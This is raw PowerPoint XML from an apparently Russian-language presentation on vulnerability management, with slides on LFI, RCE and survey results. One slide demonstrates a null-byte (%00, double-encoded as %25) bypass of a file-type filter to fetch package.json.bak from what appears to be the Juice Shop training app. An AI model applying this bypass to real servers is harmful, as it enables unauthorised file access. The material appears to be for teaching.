                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>package.json.bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> вы получите ошибку, ссылаясь на недопустимый тип файла.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Используя ядовитый нулевой байт (%00), фильтр можно обмануть, но только с изюминкой:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Доступ к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>juiceshop.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>:3000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>/package.json.bak%00.md, как ни странно, не будет успешным......</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>потому что символ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>должен быть также закодирован в URL (в %25)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> для того, чтобы позже сработать во время доступа к файловой системе.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Прямая соединительная линия 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E333607-44DE-45F5-A3EB-597D858816DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635760" y="5104765"/>
            <a:ext cx="0" cy="3035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EB5BA146-EB71-4BE9-A7C3-C02EF87B4D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469900" y="5104765"/>
            <a:ext cx="0" cy="3035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D66817AB-E3CA-48B1-AACE-29A88C43C2E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469900" y="5104765"/>
            <a:ext cx="11658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E41CC32E-0D6B-4190-BED0-970935BADC00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469900" y="5408295"/>
            <a:ext cx="11658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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B69E89-E565-44EF-BBFF-21BEEAFADD27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1635760" y="4327786"/>
            <a:ext cx="724488" cy="7162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FCF6899-8EE3-4F2B-A9D3-0D6C9F2A5238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387600" y="310757"/>
            <a:ext cx="7416800"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LFI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold"/>
              </a:rPr>
              <a:t>в жизни</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400"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878576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9281C2AC-6355-4A73-8A77-9EED30A23831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640264" y="898072"/>
            <a:ext cx="5514691" cy="833746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="6600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="6600" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="5400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2850975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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F67984B-272A-40E3-9D97-2698B0B98C2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RCE</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3974237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Объект 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="16"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1044815459"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1028000" y="1592263"/>
          <a:ext cx="10135999" cy="408082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4BAF8C2F-3A92-4C7B-8423-058178740544}"/>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panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Оценка уязвимостей</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400"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539102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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Название презентации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Объект 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="16"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="534413116"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1262264" y="1592263"/>
          <a:ext cx="9667472" cy="400290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46775819-4503-4F6A-8BEA-6786E4707FAB}"/>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panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Оценка уязвимостей</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400"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73059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Объект 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1998272" y="1954213"/>
          <a:ext cx="9667472" cy="4002903"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Текст 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Название презентации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Объект 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681831" y="2700137"/>
            <a:ext cx="3949976" cy="367653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Clr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>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ru-RU" b="1" dirty="0"/>
              <a:t>Опрос проводился </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>с 21 сентября 2021</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>по 11 октября 2021 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Мы разместили его на официальном сайте, интернет-порталах, посвященных ИБ, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>в социальных сетях, тематических чатах и каналах в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>Телеграме</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Текст 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358383" y="3082814"/>
            <a:ext cx="2022107" cy="1706182"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>заполненных анкеты</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Текст 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356686" y="2380932"/>
            <a:ext cx="2022107" cy="769737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>154</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A0C50F0-ACEC-4703-A65C-7458CB4C2945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387600" y="310757"/>
            <a:ext cx="7416800" cy="1446550"/>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a:rPr>
              <a:t>Как выстроен процесс управления</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382685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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Название презентации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Объект 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="356686" y="2345833"/>
          <a:ext cx="4027987" cy="162169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Объект 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4578691" y="2453449"/>
          <a:ext cx="4027987" cy="162169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Объект 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1356700" y="4552605"/>
          <a:ext cx="3027973" cy="162169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Объект 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4712310" y="4422993"/>
          <a:ext cx="3762219" cy="16216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Объект 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8869357" y="4444419"/>
          <a:ext cx="3027973" cy="1621697"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Рисунок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913" y="4984616"/>
            <a:ext cx="965334" cy="965334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Прямая со стрелкой 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187495" y="1817858"/>
            <a:ext cx="1332548" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cap="rnd">
            <a:roun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Скругленный прямоугольник 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9409113" y="1376263"/>
            <a:ext cx="1152000" cy="43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Скругленный прямоугольник 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8678447" y="1376263"/>
            <a:ext cx="432000" cy="43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Овал 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11000513" y="1384074"/>
            <a:ext cx="416378" cy="416378"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="190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Прямоугольник с двумя скругленными соседними углами 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927846" y="1191422"/>
            <a:ext cx="1942840" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8EB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21" name="Прямая со стрелкой 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7067550" y="1343309"/>
            <a:ext cx="1332548" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cap="rnd">
            <a:prstDash val="sys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a:off x="7067550" y="1594163"/>
            <a:ext cx="1332548" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cap="rnd">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a:off x="7067550" y="1864065"/>
            <a:ext cx="1332548" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cap="rnd">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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124450" y="1594163"/>
            <a:ext cx="1395593" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cap="rnd">
            <a:roun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Прямая со стрелкой 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187495" y="1343309"/>
            <a:ext cx="1332548" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cap="rnd">
            <a:round/>
            <a:headEnd type="oval"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30" name="Объект 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3658686922"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6792705" y="2190674"/>
          <a:ext cx="4415997" cy="182848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498637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A9A03B5-BE85-441C-8719-D1C4137F97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5317" y="1656061"/>
            <a:ext cx="368227" cy="367122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Рисунок 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16DFE13C-A6E0-4C05-A5AD-2AB757544B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4261" y="1695956"/>
            <a:ext cx="394686" cy="287331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Рисунок 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E739C81C-B028-4672-B704-A8D0D3B86C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0924" y="1660221"/>
            <a:ext cx="358802" cy="358802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Рисунок 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB73D2A-7461-4E82-A851-F00CC28AD2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4425" y="2963131"/>
            <a:ext cx="465869" cy="465869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Рисунок 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5BD8988-AC3B-44CB-98C0-A16ABC43FA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99241" y="4425714"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Рисунок 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAFB11AF-BDA0-408A-9522-ACC0517C5C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02134" y="4425714"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
